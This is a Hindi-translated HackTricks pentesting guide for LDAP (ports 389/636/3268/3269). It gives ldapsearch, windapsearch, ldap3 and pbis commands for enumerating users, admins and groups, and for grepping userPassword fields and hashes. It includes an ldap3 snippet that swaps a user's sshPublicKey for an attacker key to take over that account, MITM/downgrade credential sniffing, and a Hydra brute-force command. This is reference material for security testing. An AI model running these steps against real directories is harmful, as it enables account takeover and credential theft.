389, 636, 3268, 3269 - Pentesting LDAP

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!

HackTricks का समर्थन करने के अन्य तरीके:

यदि आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं तो सब्सक्रिप्शन प्लान्स देखें!
आधिकारिक PEASS और HackTricks स्वैग प्राप्त करें
हमारे विशेष NFTs कलेक्शन, The PEASS Family खोजें
शामिल हों 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह या हमें ट्विटर 🐦 @carlospolopm** पर फॉलो** करें।
हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके HackTricks और HackTricks Cloud github repos में।

LDAP (Lightweight Directory Access Protocol) का उपयोग मुख्य रूप से संगठन, व्यक्ति और संसाधनों जैसे फ़ाइल और उपकरणों को नेटवर्कों, सार्वजनिक और निजी दोनों में खोजने के लिए किया जाता है। यह अपने पूर्ववर्ती, DAP की तुलना में एक छोटे कोड फुटप्रिंट वाले एक संयोजित दृष्टिकोण प्रदान करता है।

LDAP निर्देशिकाएँ कई सर्वरों पर वितरित करने की अनुमति देती हैं, प्रत्येक सर्वर में निर्देशिका का एक प्रतिलिपित और समकालिक संस्करण होता है, जिसे निर्देशिका प्रणाली एजेंट (DSA) कहा जाता है। अनुरोधों को संभालने की जिम्मेदारी पूरी तरह से LDAP सर्वर पर होती है, जो अनुरोधकर्ता को एकीकृत प्रतिक्रिया प्रदान करने के लिए आवश्यकतानुसार अन्य DSAs के साथ संवाद कर सकता है।

LDAP निर्देशिका का संगठन एक वृक्ष वर्गीकरण की तरह होता है, जो ऊपर से रूट निर्देशिका से शुरू होता है। यह देशों से नीचे शाखाएँ बनाता है, जो संगठनों में विभाजित होते हैं, और फिर विभिन्न विभागों या विभागों को प्रतिनिधित्व करने वाले संगठनिक इकाइयों तक पहुंचता है, अंततः व्यक्तिगत संसाधनों स्तर तक, जिसमें लोग और फ़ाइल और प्रिंटर जैसे साझा संसाधन शामिल हैं।

डिफ़ॉल्ट पोर्ट: 389 और 636 (ldaps)। ग्लोबल कैटलॉग (ActiveDirectory में LDAP) डिफ़ॉल्ट रूप से पोर्ट 3268 और 3269 पर उपलब्ध है।

PORT    STATE SERVICE REASON
389/tcp open  ldap    syn-ack
636/tcp open  tcpwrapped

LDAP डेटा इंटरचेंज फॉर्मेट

LDIF (LDAP डेटा इंटरचेंज फॉर्मेट) निर्देशिका सामग्री को रेकॉर्ड के सेट के रूप में परिभाषित करता है। यह अपडेट अनुरोधों को भी प्रतिनिधित कर सकता है (जोड़ें, संशोधित करें, हटाएं, नाम बदलें)।

dn: dc=local
dc: local
objectClass: dcObject

dn: dc=moneycorp,dc=local
dc: moneycorp
objectClass: dcObject
objectClass: organization

dn ou=it,dc=moneycorp,dc=local
objectClass: organizationalUnit
ou: dev

dn: ou=marketing,dc=moneycorp,dc=local
objectClass: organizationalUnit
Ou: sales

dn: cn= ,ou= ,dc=moneycorp,dc=local
objectClass: personalData
cn:
sn:
gn:
uid:
ou:
mail: pepe@hacktricks.xyz
phone: 23627387495

पंक्तियाँ 1-3 शीर्ष स्तर डोमेन स्थानीय को परिभाषित करती हैं
पंक्तियाँ 5-8 पहले स्तर डोमेन मनीकॉर्प (moneycorp.local) को परिभाषित करती हैं
पंक्तियाँ 10-16 2 संगठनात्मक इकाइयों को परिभाषित करती हैं: डेव और सेल्स
पंक्तियाँ 18-26 डोमेन का एक ऑब्जेक्ट बनाती हैं और मान के साथ गुण निर्धारित करती हैं

डेटा लिखें

ध्यान दें कि यदि आप मान को संशोधित कर सकते हैं तो आप वास्तव में दिलचस्प क्रियाएँ कर सकते हैं। उदाहरण के लिए, कल्पना करें कि आप अपने उपयोगकर्ता या किसी भी उपयोगकर्ता की "sshPublicKey" जानकारी बदल सकते हैं। यह बहुत संभावना है कि यदि यह गुण मौजूद है, तो ssh लोगों की सार्वजनिक कुंजियाँ LDAP से पढ़ रहा है। यदि आप किसी उपयोगकर्ता की सार्वजनिक कुंजी को संशोधित कर सकते हैं तो आप उस उपयोगकर्ता के रूप में लॉगिन कर सकेंगे भले ही ssh में पासवर्ड प्रमाणीकरण सक्षम न हो।

# Example from https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/
>>> import ldap3
>>> server = ldap3.Server('x.x.x.x', port =636, use_ssl = True)
>>> connection = ldap3.Connection(server, 'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN', 'PASSWORD', auto_bind=True)
>>> connection.bind()
True
>>> connection.extend.standard.who_am_i()
u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'
>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})

साफ पाठ प्रमाणीकरण चोरी

यदि LDAP SSL के बिना उपयोग किया जाता है तो आप नेटवर्क में साफ पाठ में प्रमाणों को छान सकते हैं।

इसके अलावा, आप नेटवर्क में LDAP सर्वर और ग्राहक के बीच MITM हमला कर सकते हैं। यहाँ आप एक Downgrade Attack कर सकते हैं ताकि ग्राहक साफ पाठ में प्रमाणों का उपयोग करके लॉगिन कर सके।

यदि SSL का उपयोग किया जाता है तो आप MITM को बनाने की कोशिश कर सकते हैं जैसा कि ऊपर उल्लिखित है, लेकिन एक गलत प्रमाणपत्र प्रदान करके, यदि उपयोगकर्ता इसे स्वीकार करता है, तो आप प्रमाणीकरण विधि को Downgrade कर सकते हैं और पुनः प्रमाणों को देख सकते हैं।

अनाम एक्सेस

TLS SNI चेक को उमकर करें

इस लेख के अनुसार, केवल एक arbitrary डोमेन नाम के साथ LDAP सर्वर तक पहुंचकर (जैसे कंपनी.com) उसने LDAP सेवा से संपर्क किया और एक अनाम उपयोगकर्ता के रूप में जानकारी निकाली:

ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +

LDAP अनाम बाइंड

LDAP अनाम बाइंड अप्रमाणित हमलावरों को डोमेन से जानकारी प्राप्त करने की अनुमति देते हैं, जैसे पूरी सूची के रूप में उपयोगकर्ताओं, समूहों, कंप्यूटर, उपयोगकर्ता खाता गुण, और डोमेन पासवर्ड नीति। यह एक पुरानी विन्यास है, और Windows सर्वर 2003 के रूप में, केवल प्रमाणित उपयोगकर्ताओं को LDAP अनुरोध प्रारंभ करने की अनुमति है। हालांकि, व्यवस्थापकों को एक विशेष एप्लिकेशन को अनाम बाइंड करने की अनुमति देने की आवश्यकता हो सकती है और अधिक से अधिक पहुंच दी हो, इसके फलस्वरूप अप्रमाणित उपयोगकर्ताओं को सभी वस्तुओं तक पहुंच मिल सकती है।

मान्य प्रमाण

यदि आपके पास LDAP सर्वर में लॉगिन करने के लिए मान्य प्रमाण हैं, तो आप डोमेन व्यवस्थापक के बारे में सभी जानकारी को डंप कर सकते हैं:

ldapdomaindump

pip3 install ldapdomaindump
ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir]

ब्रूट फोर्स

गणना

स्वचालित

इसका उपयोग करके आप सार्वजनिक जानकारी (जैसे डोमेन नाम) देख सकेंगे:

nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials

Python

Python के साथ LDAP जाँच

आप Python का उपयोग करके क्रेडेंशियल के साथ या बिना क्रेडेंशियल के LDAP को जाँचने का प्रयास कर सकते हैं: pip3 install ldap3

पहले क्रेडेंशियल के बिना कनेक्ट करने की कोशिश करें:

>>> import ldap3
>>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True)
>>> connection = ldap3.Connection(server)
>>> connection.bind()
True
>>> server.info

यदि प्रतिक्रिया True है जैसे पिछले उदाहरण में, तो आप एलडीएपी (जैसे नेमिंग संदर्भ या डोमेन नाम) सर्वर से कुछ रोचक डेटा प्राप्त कर सकते हैं:

>>> server.info
DSA info (from DSE):
Supported LDAP versions: 3
Naming contexts:
dc=DOMAIN,dc=DOMAIN

एक बार जब आप नेमिंग संदर्भ प्राप्त कर लेते हैं, तो आप कुछ और रोमांचकारी क्वेरी बना सकते हैं। यह सरल क्वेरी आपको निर्देशिका में सभी ऑब्जेक्ट्स दिखाना चाहिए:

>>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*')
True
>> connection.entries

या लीक करें पूरा ldap:

>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=person))', search_scope='SUBTREE', attributes='userPassword')
True
>>> connection.entries

windapsearch

Windapsearch एक Python स्क्रिप्ट है जो LDAP क्वेरी का उपयोग करके Windows डोमेन से उपयोगकर्ताओं, समूह और कंप्यूटरों को जांचने के लिए उपयोगी है।

# Get computers
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers
# Get groups
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --groups
# Get users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
# Get Domain Admins
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
# Get Privileged Users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --privileged-users

ldapsearch

जांचें कि क्या आपके credentials खाली हैं या क्या आपके credentials मान्य हैं:

ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"

# CREDENTIALS NOT VALID RESPONSE
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v3839

अगर आपको कुछ मिलता है जो कहता है कि "बाइंड पूरा होना चाहिए" तो इसका मतलब है कि प्रमाणपत्र गलत है।

आप डोमेन से सभी कुछ निकाल सकते हैं:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
-x Simple Authentication
-H LDAP Server
-D My User
-w My password
-b Base site, all data from here will be given

उपयोगकर्ताओं को निकालें:

LDAP विश्लेषण करने के लिए, हमें उपयोगकर्ताओं की जानकारी प्राप्त करने की आवश्यकता होती है। इसके लिए हम निम्नलिखित कदमों का पालन कर सकते हैं:

उपयोगकर्ताओं की सूची प्राप्त करें: ldapsearch -x -LLL -h <LDAP_SERVER_IP> -b "dc=<DOMAIN>,dc=<COM>" "(objectClass=person)"
विस्तार से उपयोगकर्ता जानकारी प्राप्त करें: ldapsearch -x -LLL -h <LDAP_SERVER_IP> -b "dc=<DOMAIN>,dc=<COM>" "(objectClass=person)" <ATTRIBUTES_TO_RETRIEVE>

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
#Example: ldapsearch -x -H ldap://<IP> -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local"

कंप्यूटर्स को निकालें:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>"

मेरी जानकारी निकालें:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

Extract डोमेन व्यवस्थापक:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

डोमेन उपयोगकर्ता निकालें:

ldapsearch -x -h <LDAP_SERVER_IP> -b "dc=<DOMAIN>,dc=<COM>" -D "<LDAP_BIND_DN>" -w <PASSWORD> "(objectClass=user)"

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

एंटरप्राइज़ एडमिन्स को निकालें:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

Administrators को निकालें:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"

Extract Remote Desktop Group:

यहाँ हम देखेंगे कि कैसे हम LDAP से Remote Desktop Group की जानकारी निकाल सकते हैं।

Search for Remote Desktop Group:
- LDAP Query: (objectCategory=group)(name=Remote Desktop Users)
- Command: ldapsearch -h <LDAP_SERVER_IP> -x -b "dc=example,dc=com" "(objectCategory=group)(name=Remote Desktop Users)"
Extract Group Members:
- LDAP Query: (&(objectCategory=user)(memberOf=CN=Remote Desktop Users,CN=Users,DC=example,DC=com))
- Command: ldapsearch -h <LDAP_SERVER_IP> -x -b "dc=example,dc=com" "(&(objectCategory=user)(memberOf=CN=Remote Desktop Users,CN=Users,DC=example,DC=com))"
Analyze Results:
- Look for users listed under the Remote Desktop Group to identify potential users with remote desktop access.

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"

यदि आपके पास किसी पासवर्ड तक पहुंच है या नहीं, तो आप एक क्वेरी निष्पादित करने के बाद grep का उपयोग कर सकते हैं:

<ldapsearchcmd...> | grep -i -A2 -B2 "userpas"

pbis

आप यहाँ से pbis डाउनलोड कर सकते हैं: https://github.com/BeyondTrust/pbis-open/ और यह आम तौर पर /opt/pbis में स्थापित किया जाता है। Pbis आपको मौलिक जानकारी आसानी से प्राप्त करने की अनुमति देता है:

#Read keytab file
./klist -k /etc/krb5.keytab

#Get known domains info
./get-status
./lsa get-status

#Get basic metrics
./get-metrics
./lsa get-metrics

#Get users
./enum-users
./lsa enum-users

#Get groups
./enum-groups
./lsa enum-groups

#Get all kind of objects
./enum-objects
./lsa enum-objects

#Get groups of a user
./list-groups-for-user <username>
./lsa list-groups-for-user <username>
#Get groups of each user
./enum-users | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done

#Get users of a group
./enum-members --by-name "domain admins"
./lsa enum-members --by-name "domain admins"
#Get users of each group
./enum-groups | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done

#Get description of each user
./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n <Username> | grep "CN" | while read line; do
echo "$line";
./adtool --keytab=/etc/krb5.keytab -n <username> -a lookup-object --dn="$line" --attr "description";
echo "======================"
done

ग्राफिकल इंटरफेस

अपाचे डायरेक्टरी

यहाँ से अपाचे डायरेक्टरी डाउनलोड करें. आप इस टूल का उपयोग कैसे करें का उदाहरण यहाँ मिलेगा।

jxplorer

आप एलडीएपी सर्वर के साथ एक ग्राफिकल इंटरफेस यहाँ से डाउनलोड कर सकते हैं: http://www.jxplorer.org/downloads/users.html

डिफ़ॉल्ट रूप से इसे स्थापित किया जाता है: /opt/jxplorer

Godap

आप इसे यहाँ से एक्सेस कर सकते हैं: https://github.com/Macmod/godap

केरबेरोस के माध्यम से प्रमाणीकरण

ldapsearch का उपयोग करके आप केरबेरोस के खिलाफ NTLM के बजाय प्रमाणीकरण कर सकते हैं, पैरामीटर -Y GSSAPI का उपयोग करके।

POST

यदि आप फ़ाइलों तक पहुँच सकते हैं जहाँ डेटाबेस समाहित हैं (यह /var/lib/ldap में हो सकता है)। तो आप निम्नलिखित का उपयोग करके हैश निकाल सकते हैं:

cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u

कॉन्फ़िगरेशन फ़ाइलें

सामान्य
containers.ldif
ldap.cfg
ldap.conf
ldap.xml
ldap-config.xml
ldap-realm.xml
slapd.conf
IBM SecureWay V3 सर्वर
V3.sas.oc
Microsoft Active Directory सर्वर
msadClassesAttrs.ldif
Netscape Directory Server 4
nsslapd.sas_at.conf
nsslapd.sas_oc.conf
OpenLDAP निर्देशिका सर्वर
slapd.sas_at.conf
slapd.sas_oc.conf
Sun ONE Directory Server 5.1
75sas.ldif

Protocol_Name: LDAP    #Protocol Abbreviation if there is one.
Port_Number:  389,636     #Comma separated if there is more than one.
Protocol_Description: Lightweight Directory Access Protocol         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for LDAP
Note: |
The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint.

https://book.hacktricks.xyz/pentesting/pentesting-ldap

Entry_2:
Name: Banner Grab
Description: Grab LDAP Banner
Command: nmap -p 389 --script ldap-search -Pn {IP}

Entry_3:
Name: LdapSearch
Description: Base LdapSearch
Command: ldapsearch -H ldap://{IP} -x

Entry_4:
Name: LdapSearch Naming Context Dump
Description: Attempt to get LDAP Naming Context
Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts

Entry_5:
Name: LdapSearch Big Dump
Description: Need Naming Context to do big dump
Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}"

Entry_6:
Name: Hydra Brute Force
Description: Need User
Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!

दूसरे तरीके HackTricks का समर्थन करने के लिए:

अगर आप अपनी कंपनी को HackTricks में विज्ञापित करना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं तो सब्सक्रिप्शन प्लान्स देखें!
आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
हमारे विशेष NFTs कलेक्शन, The PEASS Family खोजें
शामिल हों 💬 Discord समूह या टेलीग्राम समूह या हमें ट्विटर 🐦 @carlospolopm** पर फॉलो** करें।
अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके HackTricks और HackTricks Cloud github repos में।

Previous264 - Pentesting Check Point FireWall-1 Next500/udp - Pentesting IPsec/IKE VPN

Last updated 3 months ago